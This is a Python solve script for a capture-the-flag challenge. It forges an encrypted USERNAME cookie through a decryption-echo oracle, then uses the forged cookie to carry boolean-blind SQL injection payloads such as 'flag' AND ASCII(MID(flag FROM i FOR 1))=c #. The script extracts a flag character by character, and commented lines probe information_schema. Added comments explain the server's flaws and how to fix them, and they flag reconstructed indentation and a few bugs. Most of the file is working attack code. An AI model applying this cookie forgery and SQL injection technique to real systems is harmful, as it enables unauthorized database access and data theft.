import ast
import html
import re
import string
from base64 import b64encode

import requests
# Challenge endpoint that every cookie probe below is sent to.
url = "http://cryptolol.challs.malice.fr"
def xor(a, b):
    """XOR two byte sequences position by position.

    ``zip`` stops at the shorter input, so the result is truncated to
    ``min(len(a), len(b))`` bytes.  Not called anywhere else in this listing.

    Args:
        a: first operand (bytes, or any iterable of ints in 0..255).
        b: second operand.

    Returns:
        bytes with ``a[i] ^ b[i]`` at each position.
    """
    return bytes(x ^ y for x, y in zip(a, b))
# Author's note: "48 for the cookie?" -- not referenced anywhere in this listing.
nickname_length = 21
# Captures whatever the server echoes between "the user" and "has been";
# send_cookie() reads that capture back.
regex = r"the user(.*) has been"
def select_subtitle(html_string):
    """Keep only the lines of *html_string* that contain the word 'subtitle'.

    Lines are split on ``'\\n'`` only (no ``splitlines``), matching the
    original behaviour on ``'\\r\\n'`` input.

    Args:
        html_string: a page body as text.

    Returns:
        The matching lines joined with ``'\\n'``; an empty string when none match.
    """
    matching = filter(lambda line: 'subtitle' in line, html_string.split('\n'))
    return '\n'.join(matching)
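def send_cookie(raw_bytes, print_whole_page):
    """Send *raw_bytes* as the base64 USERNAME cookie and return what the server reflects.

    The response body is searched with the module-level ``regex``; the text the
    server echoes between "the user" and "has been" is taken as the value the
    server reconstructed from the cookie.  That reflection is the only thing
    this function reads, so the server echoing cookie-derived data is what makes
    the probe observable at all.

    Args:
        raw_bytes: cookie payload, base64-encoded before sending.
        print_whole_page: when true, return the full response body instead of
            the reflected value (nothing is printed; the name is historical).

    Returns:
        str: the full response body when *print_whole_page* is true, or when
            the regex does not match (the server finished or errored);
        bytes: otherwise, the reflected value, HTML-unescaped, one byte per
            character (latin-1).

    Raises:
        ValueError, SyntaxError: the reflected text is not a valid string
            literal, or contains a code point above 0xFF.
    """
    headers = {"cookie": "USERNAME=%s" % b64encode(raw_bytes).decode()}
    response = requests.get(url, headers=headers)
    if print_whole_page:
        # The caller only wants the page; don't fail on parsing the reflection.
        return response.text
    match = re.search(regex, response.text)
    if match is None:
        # No reflected value: the server either finished or crashed.
        return response.text
    # [7:-5] presumably strips the markup around the echoed repr -- confirm
    # against the actual page.
    reflected = match.group(1)[7:-5]
    # The original used eval() on this server-controlled text; literal_eval
    # only parses a string literal and cannot execute anything.
    literal = ast.literal_eval('"%s"' % reflected)
    # Reconstructed: the pasted line had its HTML entities decoded by the
    # paste site.  Undo the server's HTML escaping, then take one byte per
    # character as the original ord() loop did.
    return html.unescape(literal).encode("latin-1")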
def send_username(string_to_send):
    """Ask the challenge server whether it accepts *string_to_send* as the username.

    The server appears to decrypt the USERNAME cookie block by block, each
    block depending on the previous ciphertext block, and to echo the
    decrypted value (see the regex read by send_cookie).  Because the echo
    reveals each block's decryption, the loop below chooses ciphertext
    blocks so that the server "decrypts" to exactly *string_to_send*.
    Root cause on the server side: an unauthenticated cipher whose decrypted
    output is reflected back to the client.  An authenticated mode and not
    echoing decrypted data would remove this oracle.

    Args:
        string_to_send: text the server should see as the username; padded
            with spaces to a multiple of BLOCK_SIZE.

    Returns:
        bool: True when the final response does not contain "Error" (the
        'subtitle' lines of that page are printed first), False otherwise.

    Side effects: one HTTP request per block plus one final request; prints
    on success.
    """
    # first we pad the string
    BLOCK_SIZE = 16
    string_length = len(string_to_send)
    # Always pads: a length already divisible by BLOCK_SIZE gets a full
    # extra block of spaces.
    padding_length = BLOCK_SIZE - (string_length % BLOCK_SIZE)
    string_padded = [ord(c) for c in (string_to_send + " " * padding_length)]
    # One extra all-zero block at the end; blocks are fixed from the last
    # one backwards, since changing a block alters the previous block's
    # decryption.
    cipher_text = [0]*(len(string_padded) + BLOCK_SIZE)
    number_of_pass = len(string_padded) // BLOCK_SIZE + 1
    for i in reversed(range(0, number_of_pass)):
        if i != 0:
            # Query with the current buffer and take the echoed result for
            # block (i-1).  NOTE(review): send_cookie returns str (the whole
            # page) when its regex does not match; indexing a str yields
            # characters and the XOR below then raises TypeError -- this code
            # assumes bytes came back.
            decripted = send_cookie(bytes(cipher_text), False)
            interesting_bits = decripted[(BLOCK_SIZE * (i-1)):(BLOCK_SIZE * i)]
            # Overwrite block (i-1) so that its decryption XORs to the wanted
            # plaintext bytes of block (i-1).
            for j in range(BLOCK_SIZE):
                cipher_text[(i-1) * BLOCK_SIZE + j] = interesting_bits[j]^string_padded[(i-1) * BLOCK_SIZE + j]
        else:
            # All blocks set: final request.  The caller only learns whether
            # the page reports an error.
            result = send_cookie(bytes(cipher_text), True)
            test = ("Error" not in result)
            if test:
                print(select_subtitle(result))
            return test
# NOTE(review): indentation was lost in the paste; the placement of the
# print(out+'\n') line and of the for/else below is reconstructed -- verify
# against the original.
out = ""
# Recover a value one character at a time: for each of 32 positions, try
# every 7-bit code and keep the first one the server accepts.  The 32 is a
# hard-coded upper bound on the length.
for i in range(32):
    for c in range(128):
        # NOTE(review): c is an int and ',' is a str, so this is never true
        # and nothing is skipped; ord(',') was presumably intended.
        if c == ',':
            continue
        print(out + str(c), end='\r')
        #test = send_username("groot' AND MID( (select column_name from information_schema.columns where table_name='profiles' and ordinal_position=5) FROM %s FOR 1)='%s';#"%(i+1, c))
        # Boolean-blind probe through the username: the server's error /
        # no-error answer leaks one bit per request.  The server-side
        # weakness this relies on is apparently SQL built from the username
        # string; a parameterised query would not interpret it as SQL.
        test = send_username("flag' AND ASCII(MID( flag FROM %s FOR 1))=%s #"%(i+1, c))
        if test:
            out += chr(c)
            break
    print(out+'\n')
else:
    # As reconstructed, the outer loop never breaks, so exit() always runs
    # and the final print(out) below is unreachable.
    exit()
print(out)
#table_name FROM information_schema.tables
#send_username("hackquaman' AND !='1';#")
#send_username("flag")
#ndh{l!st3n-to_me
# Author's scratch notes, kept as a bare string expression (no runtime effect).
"""
Flag:flag
Groot:groot:flag
Phishing fairy:hackquaman
Ninja:SURIMI
T
host: webmaster
db:website
table_name=profiles
columns:
username
class
websIte
avatAr
flag
"""